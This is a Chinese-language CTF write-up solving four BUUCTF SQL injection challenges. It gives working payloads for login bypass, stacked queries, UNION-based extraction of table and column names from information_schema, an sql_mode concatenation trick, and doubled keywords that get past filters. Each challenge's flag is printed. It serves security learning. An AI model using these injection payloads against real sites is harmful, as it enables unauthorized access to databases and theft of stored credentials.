BUUCTF[极客大挑战 2019]BabySQL

[极客大挑战 2019]EasySQL

题目

题解

随便输入用户名和密码，admin和admin

尝试注入：

/check.php?username=admin&password=admin’

出现报错信息，使用万能钥匙

/check.php?username=admin&password=admin’ or 1=1%23

或

根据错误信息

/check.php?username=admin&password=admin’ or’ 1=1

爆出flag，本题flag为：

flag{819d0c4e-cce7-4f46-9aad-fa85460da70d}

[SUCTF 2019]EasySQL

题目

题解

靶机界面：

输入1和其他数字，都可正常回显，但是输入0和字母无法正常回显。

抓包获取数据，此题为POST请求，数据在请求体当中

输入的信息在请求体当中。

在重发器当中测试，查看回显信息。可多次测试

发现在输入的信息后加‘、“、’）、”）等都不报错没有回显或出现Nonono。通过输入非0数字，能正常回显，0和字母不能正常回显，什么都没有显示。

猜测可能过滤了个别的sql语句

分号可正常查询数据：

query=1;

推测可能存在堆叠注入

show查看数据库

query=1;show databases;

查看数据表:

query=1;show tables;

发现Flag数据表，里面可能有我们想要的信息，尝试获取：

query=1;show columns from Flag;

show columns from用来查询表中列名称

出现Nonono，猜测可能后端过滤了Flag

刚刚我们输入非0数字正常回显，0和字母不能正常的回显，猜测说明sql语句当中可能存在||运算符，只有输入非0数字，才会返回true，回显条件。

猜测sql语句可能是select 输入||flag from Flag

构造payload：*，1

query=*,1

||短路运算，前面为真，后面短路。返回true，回显。

相当于select *，1 from Flag

select *和select 所有列的意义基本相同，两者差别几乎可忽略。所以查询所有字段（或者大多数字段）的时候，可以用select *来操作

解法二：

payload：

query=1;set sql_mode=PIPES_AS_CONCAT;select 1

其中set sql_mode=PIPES_AS_CONCAT的作用是将||的作用由or变为拼接字符串，PIPES_AS_CONCAT令||起到连接符的作用。

回显成功，发现flag

综上所示，本题flag为：

flag{c10b7151-b3b6-412b-8b0b-020f2600fcb0}

[极客大挑战 2019]LoveSQL

题目

题解

拿到该靶机，观察界面，存在登录说明存在可能SQL注入，根据题目也可得知存在SQL注入

可观察网页的源码信息，发现有check.php，猜测可能是登录界面时，输入账号和密码的跳转界面，提示信息。

回到靶机界面，尝试登录：admin和admin

工具：hackbar

提示用户名或密码错误，接下来我们进行注入，看是否报错：

/check.php?username=admin&password=admin’

出现报错信息，可以尝试使用updatexml（）函数报错注入。

但是updatexml限制字符长度为32，且最长为32位，超过32位爆不了

我们正常使用联合查询进行注入：

使用万能钥匙，看是否能爆出信息，正常回显：

/check.php?username=admin&password=admin’ or 1=1%23

或

/check.php?username=admin&password=admin’ or’ 1=1–+

正常回显，拿此信息进行登录，发现还是此界面，继续注入，判断字段的个数：

/check.php?username=admin&password=d19fdabb42e569b878538b88d47f5c91’ order by 4%23

出现错误信息，将4换成3

/check.php?username=admin&password=d19fdabb42e569b878538b88d47f5c91’ order by 3%23

正常回显，说明有3列字段

判断回显点，联合查询：

/check.php?username=admin&password=-d19fdabb42e569b878538b88d47f5c91’ union select 1,2,3%23

爆出当前的数据库版本信息以及当前的数据库：

/check.php?username=admin&password=-d19fdabb42e569b878538b88d47f5c91’ union select 1,version(),database()%23

爆数据表：

/check.php?username=admin&password=-d19fdabb42e569b878538b88d47f5c91’ union select 1,version(),group_concat(table_name) from information_schema.tables where table_schema=database()%23

猜测flag可能在第二个表当中，尝试去报第二个数据表的信息：

/check.php?username=admin&password=-d19fdabb42e569b878538b88d47f5c91’ union select 1,version(),group_concat(column_name) from information_schema.columns where table_name=‘l0ve1ysq1’%23

发现该数据包当中的敏感信息，继续爆破

爆出数据表的敏感信息，username和password：

/check.php?username=admin&password=-d19fdabb42e569b878538b88d47f5c91’ union select 1,2,group_concat(username,password) from l0ve1ysq1%23

回显成功，获取flag：

滑到最右边可观察到flag

综上所述

本题flag为flag{e45a955a-75e2-4f27-abb7-8f9ad51b020d}

猜测flag数据也可能存在其他的库当中，爆出全部的数据库信息：

/check.php?username=admin&password=-d19fdabb42e569b878538b88d47f5c91’ union select 1,version(),group_concat(schema_name) from information_schema.schemata%23

其余的查询操作同以上操作基本一致，可猜测尝试查询，获取flag信息。
如果查不到，切换其他数据库或表即可。

BUUCTF[极客大挑战 2019]BabySQL

题目

题解

根据题目和界面，我们可知这是一道SQL注入题

查看网页的源码

发现check.php，点击后发现

通过以上信息可知check.php为跳转的登录界面，输入用户和密码后登录跳转。

使用admin和admin登录：

用户密码不正常。

开始测试注入

打开hackbar获取当前的url

测试闭合方式，加入‘报错

使用万能钥匙：

根据错误信息我们猜测可以是过滤了or，在or后面加个s，ors验证一下：

测试确认，将or过滤掉了！

我们可以采用双写进行绕过尝试：

成功回显，并爆出来了用户名和密码，我们将username和password进行更换

执行后，依旧是这个界面

接下来我们来进行判断其字段的个数：

order当中存在or，所以双写绕过。

同时测试发现by也被过滤，所有我们继续双写绕过

/check.php?username=admin&password=9356e00537952a46e7bcf73abf6f2323’ oorrder bbyy 4–+

报错了，将4换成3，再次尝试：

/check.php?username=admin&password=9356e00537952a46e7bcf73abf6f2323’ oorrder bbyy 3–+

正常回显，说明有3列字段

判断回显点：

再次报错，根据报错信息，我们猜测可能还存在过滤，在union和select的后面分别加个字母（任意），测试验证：

说明union和select也被过滤了，同理我们还是双写绕过

/check.php?username=admin&password=-9356e00537952a46e7bcf73abf6f2323’ ununionion seselectlect 1,2,3–+

回显点：

爆破当前数据库以及数据库版本：

/check.php?username=admin&password=-9356e00537952a46e7bcf73abf6f2323’ ununionion seselectlect 1,version(),database()–+

爆数据库当中的数据表：

/check.php?username=admin&password=-9356e00537952a46e7bcf73abf6f2323’ ununionion seselectlect 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()–+

通过上面的过程我们不难发现，此时还存在过滤，from和where也被过滤，同理双写绕过

/check.php?username=admin&password=-9356e00537952a46e7bcf73abf6f2323’ ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()–+

正常回显。

通过观察猜测，爆b4bsql这个表数据（列的信息）：

/check.php?username=admin&password=-9356e00537952a46e7bcf73abf6f2323’ ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name=‘b4bsql’–+

得到敏感信息，我们直接爆破数据：

/check.php?username=admin&password=-9356e00537952a46e7bcf73abf6f2323’ ununionion seselectlect 1,2,group_concat(username,passwoorrd) frfromom b4bsql–+

回显成功，划到最里面可观察到flag信息：

flag字符串：

综上所示，本题flag为：

flag{8e9c11c7-b6c7-4ac7-99ab-5556af55ef3b}

我们猜测在其他的表当中，可能也存在flag，爆出所有的数据库：

/check.php?username=admin&password=-2ce9b0fc0e30d1df0ac3fec1557c3da9’ ununionion seselectlect 1,2,group_concat(schema_name) frfromom infoorrmation_schema.schemata–+

发现有ctf这个数据库，猜测ctf当中存在flag信息，爆出ctf库当中的表信息：

/check.php?username=admin&password=-2ce9b0fc0e30d1df0ac3fec1557c3da9’ ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=‘ctf’–+

发现Flag这个数据包，继续爆列的信息：

/check.php?username=admin&password=-2ce9b0fc0e30d1df0ac3fec1557c3da9’ ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name=‘Flag’–+

获取flag信息：

/check.php?username=admin&password=-2ce9b0fc0e30d1df0ac3fec1557c3da9’ ununionion seselectlect 1,2,group_concat(flag) frfromom ctf.Flag–+

成功回显，获取成功：

flag为：

flag{8fc708e5-7f33-4696-88ea-70b6f30c68ce}

文章不妥之处，欢迎批评指正！